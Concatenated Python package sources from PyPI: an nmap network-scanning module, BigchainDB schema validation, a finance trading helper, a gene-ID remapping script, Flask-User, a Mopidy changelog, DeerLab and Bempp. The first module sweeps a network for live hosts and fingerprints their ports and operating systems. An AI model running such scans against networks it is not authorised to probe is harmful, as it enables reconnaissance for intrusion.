# Call parent configure method
BaseModule.configure(self, configuration)
self.network = self.getConfigurationValue('network')
self.netmask = self.getConfigurationValue('netmask')
self.arguments = self.getConfigurationValue('arguments')
def getScannerFunc(self):
@setInterval(self.getConfigurationValue('interval'), call_on_init=True)
def scanNetwork():
# Get all alive hosts
try:
scan_results = self.scanner.scan('%s%s' % (self.network,self.netmask), arguments="-sn")
except nmap.PortScannerError:
etype, evalue, etb = sys.exc_info()
self.logger.warning("Scanning failed. Exception: %s, Error: %s." % (etype, evalue))
return
for host, scan_result in scan_results['scan'].items():
try:
host_scan_result = self.scanner.scan('%s/32' % (host), arguments=self.arguments)
except nmap.PortScannerError:
etype, evalue, etb = sys.exc_info()
self.logger.warning("Scanning failed. Exception: %s, Error: %s." % (etype, evalue))
return
if host in host_scan_result['scan']:
self.handleEvent(host, host_scan_result['scan'][host])
return scanNetwork
def handleEvent(self, host, scan_result):
# Get OS from scan.
if 'osmatch' in scan_result:
os_info = sorted(scan_result['osmatch'], key=lambda k: int(k['accuracy']))
scan_result['detected_os'] = os_info[0]['name']
scan_result.pop('osmatch')
if 'vendor' in scan_result and isinstance(scan_result['vendor'], dict) and len(scan_result['vendor']) > 0:
scan_result['vendor'] = scan_result['vendor'].values()[0]
# Drop some fields.
if 'osclass' in scan_result:
scan_result.pop('osclass')
event = DictUtils.getDefaultEventDict(scan_result, caller_class_name=self.__class__.__name__)
event['lumbermill']['event_type'] = 'nmap_scan'
self.sendEvent(event)
def start(self):
self.scanner = nmap.PortScanner()
timed_func = self.getScannerFunc()
self.timed_func_handler = TimedFunctionManager.startTimedFunction(timed_func) | PypiClean |
/BigchainDBNext-2.2.2.1.tar.gz/BigchainDBNext-2.2.2.1/bigchaindb/common/schema/__init__.py |
"""Schema validation related functions and data"""
import os.path
import logging
import jsonschema
import yaml
import rapidjson
from bigchaindb.common.exceptions import SchemaValidationError
logger = logging.getLogger(__name__)
def _load_schema(name, path=__file__):
"""Load a schema from disk"""
path = os.path.join(os.path.dirname(path), name + '.yaml')
with open(path) as handle:
schema = yaml.safe_load(handle)
fast_schema = rapidjson.Validator(rapidjson.dumps(schema))
return path, (schema, fast_schema)
TX_SCHEMA_VERSION = 'v2.0'
TX_SCHEMA_PATH, TX_SCHEMA_COMMON = _load_schema('transaction_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_CREATE = _load_schema('transaction_create_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_TRANSFER = _load_schema('transaction_transfer_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_VALIDATOR_ELECTION = _load_schema('transaction_validator_election_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_CHAIN_MIGRATION_ELECTION = _load_schema('transaction_chain_migration_election_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_VOTE = _load_schema('transaction_vote_' + TX_SCHEMA_VERSION)
def _validate_schema(schema, body):
"""Validate data against a schema"""
# Note
#
# Schema validation is currently the major CPU bottleneck of
# BigchainDB. the `jsonschema` library validates python data structures
# directly and produces nice error messages, but validation takes 4+ ms
# per transaction which is pretty slow. The rapidjson library validates
# much faster at 1.5ms, however it produces _very_ poor error messages.
# For this reason we use both, rapidjson as an optimistic pathway and
# jsonschema as a fallback in case there is a failure, so we can produce
# a helpful error message.
try:
schema[1](rapidjson.dumps(body))
except ValueError as exc:
try:
jsonschema.validate(body, schema[0])
except jsonschema.ValidationError as exc2:
raise SchemaValidationError(str(exc2)) from exc2
logger.warning('code problem: jsonschema did not raise an exception, wheras rapidjson raised %s', exc)
raise SchemaValidationError(str(exc)) from exc
def validate_transaction_schema(tx):
"""Validate a transaction dict.
TX_SCHEMA_COMMON contains properties that are common to all types of
transaction. TX_SCHEMA_[TRANSFER|CREATE] add additional constraints on top.
"""
_validate_schema(TX_SCHEMA_COMMON, tx)
if tx['operation'] == 'TRANSFER':
_validate_schema(TX_SCHEMA_TRANSFER, tx)
else:
_validate_schema(TX_SCHEMA_CREATE, tx) | PypiClean |
/Lab93-Finance-0.0.1.4.tar.gz/Lab93-Finance-0.0.1.4/src/Lab93_Finance/__init__.py | from datetime import datetime, timedelta
from time import sleep
# Lab-93 Modules
from Lab93_DatabaseSystem import AdministratorDatabase
# Local Imports
from .graphing.CandlestickGraphs import drawCandlestick
from .data import PriceData
from .data.historic import Queries
from .account import AccountDetails
from .trading import TradeBroker
AdminDB = AdministratorDatabase()
today = datetime.today()
yesterday = today - timedelta(days=1)
# Establish connection to the broker API
AlpacaAPI = AccountDetails(
( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) )
)
CryptoPrices = PriceData(
asset_type = "crypto", credentials = \
( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) )
)
def Ticker():
while True:
sleep(1)
yield format(CryptoPrices.CurrentPrice("BTC/USD"), ".2f")
TradingBroker = TradeBroker(AlpacaAPI.client)
class GraphingReports:
def __init__(self, start=yesterday, end=today,
output = "/server/front-end/assets/data-science/reports" ):
# Collect High, Low, Open, Close, and Times for the given symbol.
# TODO: Allow for custom symbol entries.
# TODO: Allow for custom timeframes.
# TODO: Retrieve credentials from environment.
data = Queries( start = start, end = end, symbols = [ "BTC/USD" ],
timeframe = "hour",
credentials = ( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) ) )\
.HLOC()\
.data
# Convert start date into string separated by forward slashes.
datestring = datetime.strftime(start, "%Y/%m/%d")
# Organize data array into packet hashmap for passing to Candlestick class.
self.packet = {
"time": [ line.timestamp for symbol in data for line in data[symbol] ],
"high": [ line.high for symbol in data for line in data[symbol] ],
"low": [ line.low for symbol in data for line in data[symbol] ],
"open": [ line.open for symbol in data for line in data[symbol] ],
"close": [ line.close for symbol in data for line in data[symbol] ],
"symbol": [ line.symbol for symbol in data for line in data[symbol] ][0]
}
# Draw the candlestick graph at the specially formulated filepath.
drawCandlestick( self.packet, f"{output}/{datestring}") | PypiClean |
/BioFlow-0.2.3.tar.gz/BioFlow-0.2.3/bioflow/utils/remap_IDs.py | from csv import reader as csv_reader
from csv import writer as csv_writer
high_conf_translation_dict = {}
low_conf_translation_dict = {}
genes_to_ids_dict = {}
# translation_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/Mouse_2_human.tsv'
# gene_to_id_file_location = ''
# data_source_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/both_ENSMUG.csv'
# data_dump_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/both_ENSHUM.csv'
translation_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Veena data/Mouse_2_human.tsv'
gene_to_id_file_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/mouse_look_up_table.tsv'
data_source_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/all_significant.csv'
data_dump_location = '/home/andrei/Dropbox/workspaces/JHU/Ewald Lab/Kp_Km data/all_sig_hum.csv'
with open(translation_file_location, 'r') as source:
reader = csv_reader(source, delimiter='\t')
print reader.next()
for line in reader:
if line[0] and line[1]:
if int(line[3]):
# We still need to account for the confidence in mapping
high_conf_translation_dict[line[0]] = [line[1], line[2]]
# print line[0:4]
else:
low_conf_translation_dict[line[0]] = [line[1], line[2]]
high_conf_trans = []
low_conf_trans = []
if gene_to_id_file_location:
with open(gene_to_id_file_location, 'r') as source:
reader = csv_reader(source, delimiter='\t')
print reader.next()
for line in reader:
genes_to_ids_dict[line[2]] = line[0]
with open(data_source_location, 'r') as source:
reader = csv_reader(source)
for i, line in enumerate(reader):
word = line[0]
if gene_to_id_file_location:
word = genes_to_ids_dict.get(word, 'None found')
if word in high_conf_translation_dict.keys():
high_conf_trans.append(high_conf_translation_dict[word])
if word in low_conf_translation_dict.keys():
low_conf_trans.append(low_conf_translation_dict[word])
print "out of %s, %s were translated with high confidence, %s with low and %s were not found" % \
(i, len(high_conf_trans), len(low_conf_trans), i-len(high_conf_trans)-len(low_conf_trans))
with open(data_dump_location, 'w') as destination:
writer = csv_writer(destination)
writer.writerows((word for word in high_conf_trans)) | PypiClean |
/Flask-User-pt-0.6.21.tar.gz/Flask-User-pt-0.6.21/flask_user/__init__.py | from passlib.context import CryptContext
from flask import Blueprint, current_app, url_for, render_template
from flask_login import LoginManager, UserMixin as LoginUserMixin
from flask_user.db_adapters import DBAdapter
from .db_adapters import SQLAlchemyAdapter
from . import emails
from . import forms
from . import passwords
from . import settings
from . import tokens
from . import translations
from . import views
from . import signals
from .translations import get_translations
# Enable the following: from flask_user import current_user
from flask_login import current_user
# Enable the following: from flask_user import login_required, roles_required
from .decorators import *
# Enable the following: from flask_user import user_logged_in
from .signals import *
# Flask-User package release identifier (PEP 396 style version attribute).
__version__ = '0.6.21'
def _call_or_get(function_or_property):
return function_or_property() if callable(function_or_property) else function_or_property
def _flask_user_context_processor():
    """Expose 'user_manager' and the call_or_get helper to Jinja2 templates."""
    return {
        'user_manager': current_app.user_manager,
        'call_or_get': _call_or_get,
    }
class UserManager(object):
    """ This is the Flask-User object that manages the User management process."""

    def __init__(self, db_adapter=None, app=None, **kwargs):
        """ Create the UserManager object """
        self.db_adapter = db_adapter
        self.app = app
        # Standard Flask extension pattern: configure immediately only when
        # both the adapter and the app are supplied; otherwise the caller is
        # expected to call init_app() later.
        if db_adapter is not None and app is not None:
            self.init_app(app, db_adapter, **kwargs)

    def init_app(self, app, db_adapter=None,
                # Forms
                add_email_form=forms.AddEmailForm,
                change_password_form=forms.ChangePasswordForm,
                change_username_form=forms.ChangeUsernameForm,
                forgot_password_form=forms.ForgotPasswordForm,
                login_form=forms.LoginForm,
                register_form=forms.RegisterForm,
                resend_confirm_email_form=forms.ResendConfirmEmailForm,
                reset_password_form=forms.ResetPasswordForm,
                invite_form=forms.InviteForm,
                # Validators
                username_validator=forms.username_validator,
                password_validator=forms.password_validator,
                # View functions
                render_function=render_template,
                change_password_view_function=views.change_password,
                change_username_view_function=views.change_username,
                confirm_email_view_function=views.confirm_email,
                email_action_view_function=views.email_action,
                forgot_password_view_function=views.forgot_password,
                login_view_function=views.login,
                logout_view_function=views.logout,
                manage_emails_view_function=views.manage_emails,
                register_view_function=views.register,
                resend_confirm_email_view_function = views.resend_confirm_email,
                reset_password_view_function = views.reset_password,
                unconfirmed_email_view_function = views.unconfirmed,
                unauthenticated_view_function = views.unauthenticated,
                unauthorized_view_function = views.unauthorized,
                user_profile_view_function = views.user_profile,
                invite_view_function = views.invite,
                # Misc
                # NOTE(review): LoginManager() and TokenManager() below are
                # mutable default arguments -- they are created once at import
                # time and shared by every call that relies on the default.
                # Confirm this is intended before using one UserManager per
                # app in the same process.
                login_manager=LoginManager(),
                password_crypt_context=None,
                send_email_function = emails.send_email,
                make_safe_url_function = views.make_safe_url,
                token_manager=tokens.TokenManager(),
                legacy_check_password_hash=None
                ):
        """ Initialize the UserManager object """
        self.app = app
        if db_adapter is not None:
            self.db_adapter = db_adapter
        # Forms
        self.add_email_form = add_email_form
        self.change_password_form = change_password_form
        self.change_username_form = change_username_form
        self.forgot_password_form = forgot_password_form
        self.login_form = login_form
        self.register_form = register_form
        self.resend_confirm_email_form = resend_confirm_email_form
        self.reset_password_form = reset_password_form
        self.invite_form = invite_form
        # Validators
        self.username_validator = username_validator
        self.password_validator = password_validator
        # View functions
        self.render_function = render_function
        self.change_password_view_function = change_password_view_function
        self.change_username_view_function = change_username_view_function
        self.confirm_email_view_function = confirm_email_view_function
        self.email_action_view_function = email_action_view_function
        self.forgot_password_view_function = forgot_password_view_function
        self.login_view_function = login_view_function
        self.logout_view_function = logout_view_function
        self.manage_emails_view_function = manage_emails_view_function
        self.register_view_function = register_view_function
        self.resend_confirm_email_view_function = resend_confirm_email_view_function
        self.reset_password_view_function = reset_password_view_function
        self.unconfirmed_email_view_function = unconfirmed_email_view_function
        self.unauthenticated_view_function = unauthenticated_view_function
        self.unauthorized_view_function = unauthorized_view_function
        self.user_profile_view_function = user_profile_view_function
        self.invite_view_function = invite_view_function
        # Misc
        self.login_manager = login_manager
        self.token_manager = token_manager
        self.password_crypt_context = password_crypt_context
        self.send_email_function = send_email_function
        self.make_safe_url_function = make_safe_url_function
        self.legacy_check_password_hash = legacy_check_password_hash

        # NOTE(review): the bare string below is a no-op statement, not a
        # docstring; kept for fidelity.
        """ Initialize app.user_manager."""
        # Bind Flask-USER to app
        app.user_manager = self
        # Flask seems to also support the current_app.extensions[] list
        if not hasattr(app, 'extensions'):
            app.extensions = {}
        app.extensions['user'] = self

        # Set defaults for undefined settings
        settings.set_default_settings(self, app.config)
        # Make sure the settings are valid -- raise ConfigurationError if not
        settings.check_settings(self)

        # Initialize Translations -- Only if Flask-Babel has been installed
        if hasattr(app.jinja_env, 'install_gettext_callables'):
            app.jinja_env.install_gettext_callables(
                lambda x: get_translations().ugettext(x),
                lambda s, p, n: get_translations().ungettext(s, p, n),
                newstyle=True)
        else:
            app.jinja_env.add_extension('jinja2.ext.i18n')
            app.jinja_env.install_null_translations()

        # Create password_crypt_context if needed
        if not self.password_crypt_context:
            self.password_crypt_context = CryptContext(
                schemes=[app.config['USER_PASSWORD_HASH']])

        # Setup Flask-Login
        self.setup_login_manager(app)

        # Setup TokenManager
        self.token_manager.setup(app.config.get('SECRET_KEY'))

        # Add flask_user/templates directory using a Blueprint
        blueprint = Blueprint('flask_user', 'flask_user', template_folder='templates')
        app.register_blueprint(blueprint)

        # Add URL routes
        self.add_url_routes(app)

        # Add context processor
        app.context_processor(_flask_user_context_processor)

        # Prepare for translations
        _ = translations.gettext

    def setup_login_manager(self, app):
        """Configure Flask-Login: register the user loader callback and
        attach the login manager to *app*."""

        # Flask-Login calls this function to retrieve a User record by user ID.
        # Note: user_id is a UNICODE string returned by UserMixin.get_id().
        # See https://flask-login.readthedocs.org/en/latest/#how-it-works
        @self.login_manager.user_loader
        def load_user_by_id(user_unicode_id):
            user_id = int(user_unicode_id)
            #print('load_user_by_id: user_id=', user_id)
            return self.get_user_by_id(user_id)

        self.login_manager.login_view = 'user.login'
        self.login_manager.init_app(app)

    def add_url_routes(self, app):
        """ Add URL Routes"""
        # Routes are registered only for the features enabled in settings
        # (the self.enable_* flags are filled in by settings.set_default_settings).
        app.add_url_rule(self.login_url, 'user.login', self.login_view_function, methods=['GET', 'POST'])
        app.add_url_rule(self.logout_url, 'user.logout', self.logout_view_function, methods=['GET', 'POST'])
        if self.enable_confirm_email:
            app.add_url_rule(self.confirm_email_url, 'user.confirm_email', self.confirm_email_view_function)
            app.add_url_rule(self.resend_confirm_email_url, 'user.resend_confirm_email', self.resend_confirm_email_view_function, methods=['GET', 'POST'])
        if self.enable_change_password:
            app.add_url_rule(self.change_password_url, 'user.change_password', self.change_password_view_function, methods=['GET', 'POST'])
        if self.enable_change_username:
            app.add_url_rule(self.change_username_url, 'user.change_username', self.change_username_view_function, methods=['GET', 'POST'])
        if self.enable_forgot_password:
            app.add_url_rule(self.forgot_password_url, 'user.forgot_password', self.forgot_password_view_function, methods=['GET', 'POST'])
            app.add_url_rule(self.reset_password_url, 'user.reset_password', self.reset_password_view_function, methods=['GET', 'POST'])
        if self.enable_register:
            app.add_url_rule(self.register_url, 'user.register', self.register_view_function, methods=['GET', 'POST'])
        if self.db_adapter.UserEmailClass:
            app.add_url_rule(self.email_action_url, 'user.email_action', self.email_action_view_function)
            app.add_url_rule(self.manage_emails_url, 'user.manage_emails', self.manage_emails_view_function, methods=['GET', 'POST'])
        app.add_url_rule(self.user_profile_url, 'user.profile', self.user_profile_view_function, methods=['GET', 'POST'])
        if self.enable_invitation:
            app.add_url_rule(self.invite_url, 'user.invite', self.invite_view_function, methods=['GET', 'POST'])

    # Obsoleted function. Replace with hash_password()
    def generate_password_hash(self, password):
        """Deprecated alias for hash_password()."""
        return passwords.hash_password(self, password)

    def hash_password(self, password):
        """Return the hash of *password* using the configured crypt context."""
        return passwords.hash_password(self, password)

    def get_password(self, user):
        """Return the stored password hash for *user*, looking at whichever
        model class (User, UserAuth or UserProfile layout) holds it."""
        use_auth_class = True if self.db_adapter.UserAuthClass and hasattr(user, 'user_auth') else False
        # Handle v0.5 backward compatibility
        if self.db_adapter.UserProfileClass:
            hashed_password = user.password
        else:
            hashed_password = user.user_auth.password if use_auth_class else user.password
        return hashed_password

    def update_password(self, user, hashed_password):
        """Store *hashed_password* on the appropriate model class and commit."""
        use_auth_class = True if self.db_adapter.UserAuthClass and hasattr(user, 'user_auth') else False
        if use_auth_class:
            user.user_auth.password = hashed_password
        else:
            user.password = hashed_password
        self.db_adapter.commit()

    def verify_password(self, password, user):
        """
        Make it backward compatible to legacy password hash.
        In addition, if such password were found, update the user's password field.
        """
        verified = False
        hashed_password = self.get_password(user)
        try:
            verified = passwords.verify_password(self, password, hashed_password)
        except ValueError:
            # The stored hash is in a format passlib does not recognise;
            # fall back to the caller-supplied legacy checker (if any) and
            # transparently re-hash on success.
            legacy_check = self.legacy_check_password_hash
            if legacy_check:
                verified = legacy_check(hashed_password, password)
                if verified:
                    # update the hash
                    new_hash = self.hash_password(password)
                    self.update_password(user, new_hash)
        return verified

    def generate_token(self, user_id):
        """Return a signed token encoding *user_id*."""
        return self.token_manager.generate_token(user_id)

    def verify_token(self, token, expiration_in_seconds):
        """Decode *token*, enforcing the given expiration window."""
        return self.token_manager.verify_token(token, expiration_in_seconds)

    def get_user_by_id(self, user_id):
        """Retrieve a user (or UserAuth, for the v0.5 layout) by primary key."""
        # Handle v0.5 backward compatibility
        ObjectClass = self.db_adapter.UserAuthClass if self.db_adapter.UserAuthClass and self.db_adapter.UserProfileClass else self.db_adapter.UserClass
        return self.db_adapter.get_object(ObjectClass, user_id)

    # NB: This backward compatibility function may be obsoleted in the future
    # Use 'get_user_by_id() instead.
    def find_user_by_id(self, user_id):
        print('Warning: find_user_by_id() will be deprecated in the future. User get_user_by_id() instead.')
        return self.get_user_by_id(user_id)

    def get_user_email_by_id(self, user_email_id):
        """Retrieve a UserEmail record by primary key."""
        return self.db_adapter.get_object(self.db_adapter.UserEmailClass, user_email_id)

    # NB: This backward compatibility function may be obsoleted in the future
    # Use 'get_user_email_by_id() instead.
    def find_user_email_by_id(self, user_email_id):
        print('Warning: find_user_email_by_id() will be deprecated in the future. User get_user_email_by_id() instead.')
        return self.get_user_email_by_id(user_email_id)

    def find_user_by_username(self, username):
        """Case-insensitive lookup of a user by username; returns None when
        not found."""
        user_auth = None
        # The username field can either be in the UserAuth class or in the User class
        if self.db_adapter.UserAuthClass and hasattr(self.db_adapter.UserAuthClass, 'username'):
            user_auth = self.db_adapter.ifind_first_object(self.db_adapter.UserAuthClass, username=username)
            # Handle v0.5 backward compatibility
            if self.db_adapter.UserProfileClass: return user_auth
            user = user_auth.user if user_auth else None
        else:
            user = self.db_adapter.ifind_first_object(self.db_adapter.UserClass, username=username)
        return user

    def find_user_by_email(self, email):
        """Case-insensitive lookup by email.

        Returns a (user, user_email) tuple; user_email is None unless a
        separate UserEmail class is configured."""
        user_email = None
        user_auth = None
        if self.db_adapter.UserEmailClass:
            user_email = self.db_adapter.ifind_first_object(self.db_adapter.UserEmailClass, email=email)
            user = user_email.user if user_email else None
        else:
            # The email field can either be in the UserAuth class or in the User class
            if self.db_adapter.UserAuthClass and hasattr(self.db_adapter.UserAuthClass, 'email'):
                user_auth = self.db_adapter.ifind_first_object(self.db_adapter.UserAuthClass, email=email)
                # Handle v0.5 backward compatibility
                if self.db_adapter.UserProfileClass: return (user_auth, user_email)
                user = user_auth.user if user_auth else None
            else:
                user = self.db_adapter.ifind_first_object(self.db_adapter.UserClass, email=email)
        return (user, user_email)

    def email_is_available(self, new_email):
        """ Return True if new_email does not exist.
            Return False otherwise."""
        user, user_email = self.find_user_by_email(new_email)
        return (user==None)

    def username_is_available(self, new_username):
        """ Return True if new_username does not exist or if new_username equals old_username.
            Return False otherwise."""
        # Allow user to change username to the current username
        if _call_or_get(current_user.is_authenticated):
            current_username = current_user.user_auth.username if self.db_adapter.UserAuthClass and hasattr(current_user, 'user_auth') else current_user.username
            if new_username == current_username:
                return True
        # See if new_username is available
        return self.find_user_by_username(new_username)==None

    def send_reset_password_email(self, email):
        """Email a tokenized reset-password link to the account registered
        under *email* (silently does nothing for unknown addresses)."""
        # Find user by email
        user, user_email = self.find_user_by_email(email)
        if user:
            # Generate reset password link
            token = self.generate_token(int(user.get_id()))
            reset_password_link = url_for('user.reset_password', token=token, _external=True)

            # Send forgot password email
            emails.send_forgot_password_email(user, user_email, reset_password_link)

            # Send forgot_password signal
            signals.user_forgot_password.send(current_app._get_current_object(), user=user)
class UserMixin(LoginUserMixin):
    """ This class adds methods to the User model class required by Flask-Login and Flask-User."""

    def is_active(self):
        """Return whether the account is enabled, supporting both the
        'active' and the legacy 'is_enabled' attribute names."""
        if hasattr(self, 'active'):
            return self.active
        else:
            return self.is_enabled

    def set_active(self, active):
        """Enable/disable the account, writing whichever attribute the model
        actually defines ('active' or legacy 'is_enabled')."""
        if hasattr(self, 'active'):
            self.active = active
        else:
            self.is_enabled = active

    def _role_names(self):
        """Return the list of role names attached to this user ([] when none).

        Developers may attach the Roles either to the User or to the
        UserProfile object; both layouts are supported. This helper replaces
        the identical inline logic previously duplicated in has_role() and
        has_roles()."""
        if hasattr(self, 'roles'):
            roles = self.roles
        elif hasattr(self, 'user_profile') and hasattr(self.user_profile, 'roles'):
            roles = self.user_profile.roles
        else:
            roles = None
        if not roles:
            return []
        # Translate a list of role objects to a list of role_names
        return [role.name for role in roles]

    def has_role(self, *specified_role_names):
        """ Return True if the user has one of the specified roles. Return False otherwise.

            has_roles() accepts a 1 or more role name parameters
                has_role(role_name1, role_name2, role_name3).

            For example:
                has_roles('a', 'b')
            Translates to:
                User has role 'a' OR role 'b'
        """
        user_role_names = self._role_names()
        if not user_role_names:
            return False
        # Return True if one of the role_names matches
        return any(role_name in user_role_names for role_name in specified_role_names)

    def has_roles(self, *requirements):
        """ Return True if the user has all of the specified roles. Return False otherwise.

            has_roles() accepts a list of requirements:
                has_role(requirement1, requirement2, requirement3).

            Each requirement is either a role_name, or a tuple_of_role_names.
                role_name example:   'manager'
                tuple_of_role_names: ('funny', 'witty', 'hilarious')
            A role_name-requirement is accepted when the user has this role.
            A tuple_of_role_names-requirement is accepted when the user has ONE of these roles.
            has_roles() returns true if ALL of the requirements have been accepted.

            For example:
                has_roles('a', ('b', 'c'), d)
            Translates to:
                User has role 'a' AND (role 'b' OR role 'c') AND role 'd'"""
        user_role_names = self._role_names()
        if not user_role_names:
            return False
        # has_roles() accepts a list of requirements; ALL must be satisfied.
        for requirement in requirements:
            if isinstance(requirement, (list, tuple)):
                # tuple_of_role_names requirement: ONE of these roles suffices
                if not any(role_name in user_role_names for role_name in requirement):
                    return False
            else:
                # plain role_name requirement: the user must have this role
                if requirement not in user_role_names:
                    return False
        # All requirements have been met: return True
        return True

    # Flask-Login is capable of remembering the current user ID in the browser's session.
    # This function enables the user ID to be encrypted as a token.
    # See https://flask-login.readthedocs.org/en/latest/#remember-me
    def get_auth_token(self):
        """Return an encrypted token encoding this user's ID for
        Flask-Login's remember-me cookie."""
        token_manager = current_app.user_manager.token_manager
        user_id = int(self.get_id())
        token = token_manager.encrypt_id(user_id)
        #print('get_auth_token: user_id=', user_id, 'token=', token)
        return token

    def has_confirmed_email(self):
        """Return True if the user has at least one confirmed email address.

        Note: the stray '| PypiClean' token fused onto the original return
        statement has been removed."""
        db_adapter = current_app.user_manager.db_adapter

        # Handle multiple emails per user: Find at least one confirmed email
        if db_adapter.UserEmailClass:
            user_emails = db_adapter.find_all_objects(
                db_adapter.UserEmailClass, user_id=self.id)
            return any(user_email.confirmed_at for user_email in user_emails)

        # Handle single email per user
        return True if self.confirmed_at else False
Changelog
=========
v2.0.2 (2021-02-10)
-------------------
- #40 Fix exception on URI parsing
v2.0.1 (2021-01-07)
-------------------
- #37 Fix image display (Thanks to @dreamlayers and @morithil)
v2.0.0 (2020-03-11)
-------------------
- #36 Ready for Mopidy 3.0
v2.0.0rc1 (2019-12-04)
----------------------
- #32 Migrate to Python 3.7
v1.1.0 (2017-10-14)
-------------------
- #24: Graceful fallback
- #28: Various fix (DJ as artist, station ordering)
v1.0.1 (2016-01-19)
-------------------
- Use httpclient helper from Mopidy >= 1.1
v0.8.0 (2015-11-09)
-------------------
- #20: Replace HTTP with HTTPS for channels.xml
v0.7.1 (2015-01-04)
-------------------
- #11: Add Low Bitrate encoding (aacp)
v0.7.0 (2014-07-29)
-------------------
- #10: Remove playlists provider
v0.6.0 (2014-03-15)
-------------------
- Directly show PLS in browser
- Clarify how the 'quality' and 'encoding' settings work together
v0.5.1 (2014-03-09)
-------------------
- Fix doc typo
v0.5.0 (2014-03-03)
-------------------
- #5: Select preferred quality and format from config
- Add tests and Travis-CI support
v0.4.0 (2014-02-16)
-------------------
- Add browse support for LibraryController
v0.3.1 (2014-01-30)
-------------------
- #3: Correct wrong subclassing
v0.3.0 (2014-01-29)
-------------------
- Require Mopidy >= 0.18
- Add proxy support for downloading SomaFM content
- #1: handle 'requests' exceptions
- Use builtin Mopidy's .pls support
- Internal code cleanup
v0.2.0 (2013-09-22)
-------------------
- PLS files are downloaded to local temp directory
- Implement library::lookup to allow adding tracks from playlist uri
v0.1.1 (2013-09-14)
-------------------
- Update Licence information
v0.1.0 (2013-09-13)
-------------------
- Initial release
- Create SomaFM extension for Mopidy
| PypiClean |
/DeerLab-1.1.1.tar.gz/DeerLab-1.1.1/deerlab/distancerange.py | import numpy as np
def distancerange(t, nr=None):
    r"""
    Empirical distance range given a dipolar EPR experiment time axis

    The distance range is determined by the time step and the Nyquist criterion
    for the minimum distance, and by the requirement that at least half an
    oscillation should be observable over the measured time window for the
    maximum distance.

    Parameters
    ----------
    t : array_like
        Time axis, in microseconds. The time points at which the dipolar signal was measured.
    nr : scalar, integer
        Length of output distance axis. If not given, only min and max distance are returned.

    Returns
    -------
    r : ndarray or tuple
        Distance axis, in nanometers, running between empirical lower and upper limits ``rmin`` and ``rmax``.
        Either an ndarray ``r`` (if ``nr`` is given) or a tuple ``(rmin,rmax)`` (if ``nr`` is not given).

    Notes
    -----
    The minimum distance is determined by the time step :math:`\Delta t` and the Nyquist criterion:

    .. math:: r_\text{min} = \left( \frac{4\Delta t \nu_0}{0.85} \right)^{1/3}

    The maximum distance is determined by the requirement that at least half
    an oscillation should be observable over the measured time window from
    :math:`t_\text{min}` to :math:`t_\text{max}`.

    .. math:: r_\text{max} = 6\left( \frac{t_\text{max}-t_\text{min}}{2} \right)^{1/3}

    where :math:`\nu_0` = 52.04 MHz nm^3.

    See Jeschke et al, Appl. Magn. Reson. 30, 473-498 (2006), https://doi.org/10.1007/BF03166213
    """
    t = np.atleast_1d(t)
    D = 52.04  # dipolar constant, MHz nm^3

    # Minimum distance is determined by maximum frequency detectable with
    # the given time increment, based on Nyquist
    dt = np.mean(np.diff(t))  # time increment
    nupara_max = 1 / 2 / dt   # maximum parallel dipolar frequency (Nyquist)
    nu_max = nupara_max / 2   # maximum perpendicular dipolar frequency
    nu_max = nu_max * 0.85    # add a bit of buffer
    rmin = (D / nu_max) ** (1 / 3)

    # At least half a period of the oscillation
    # should be observable in the time window.
    trange = np.max(t) - np.min(t)
    Tmax = trange * 2  # maximum period length
    rmax = (D * Tmax) ** (1 / 3)

    # (Fixed: the original return statement had a stray "| PypiClean" token
    # fused onto it, which raised NameError at runtime.)
    if nr is not None:
        return np.linspace(rmin, rmax, nr)
    return (rmin, rmax)
/Bempp-cl-0.3.1.tar.gz/Bempp-cl-0.3.1/bempp/api/__init__.py |
# # Monkey patch Numba to emit log messages when compiling
# import numba
# oldcompile = numba.core.registry.CPUDispatcher.compile
# def compile_with_log(*args, **kwargs):
# """Numba compilation with log messages."""
# import bempp.api
# fun_name = args[0].py_func.__name__
# bempp.api.log(f"Compiling {fun_name} for signature {args[1]}.", level="debug")
# res = oldcompile(*args, **kwargs)
# bempp.api.log(f"Compilation finished.", level="debug")
# return res
# numba.core.registry.CPUDispatcher.compile = compile_with_log
import os as _os
import tempfile as _tempfile
import logging as _logging
import time as _time
import platform as _platform
from bempp.api.utils import DefaultParameters
from bempp.api.utils.helpers import MemProfiler
from bempp.api.utils.helpers import assign_parameters
from bempp.api.grid.io import import_grid
from bempp.api.grid.io import export
from bempp.api.grid.grid import Grid
from bempp.api.assembly.grid_function import GridFunction
from bempp.api.assembly.grid_function import real_callable
from bempp.api.assembly.grid_function import complex_callable
from bempp.api.assembly.grid_function import callable
from bempp.api.space import function_space
from bempp.api import shapes
from bempp.api import integration
from bempp.api import operators
from bempp.api.linalg.direct_solvers import lu, compute_lu_factors
from bempp.api.linalg.iterative_solvers import gmres, cg
from bempp.api.assembly.discrete_boundary_operator import as_matrix
from bempp.api.assembly.boundary_operator import ZeroBoundaryOperator
from bempp.api.assembly.boundary_operator import MultiplicationOperator
from bempp.api.assembly.blocked_operator import BlockedOperator
from bempp.api.assembly.blocked_operator import GeneralizedBlockedOperator
from bempp.api.fmm.fmm_assembler import clear_fmm_cache
from bempp.api.utils import pool
from bempp.api.utils.pool import create_device_pool
from numba.core.errors import (
NumbaDeprecationWarning,
NumbaPendingDeprecationWarning,
NumbaPerformanceWarning,
)
import warnings

# Numba emits chatty deprecation/performance warnings during JIT
# compilation; silence them so users only see bempp's own messages.
warnings.simplefilter("ignore", category=NumbaDeprecationWarning)
warnings.simplefilter("ignore", category=NumbaPendingDeprecationWarning)
warnings.simplefilter("ignore", category=NumbaPerformanceWarning)
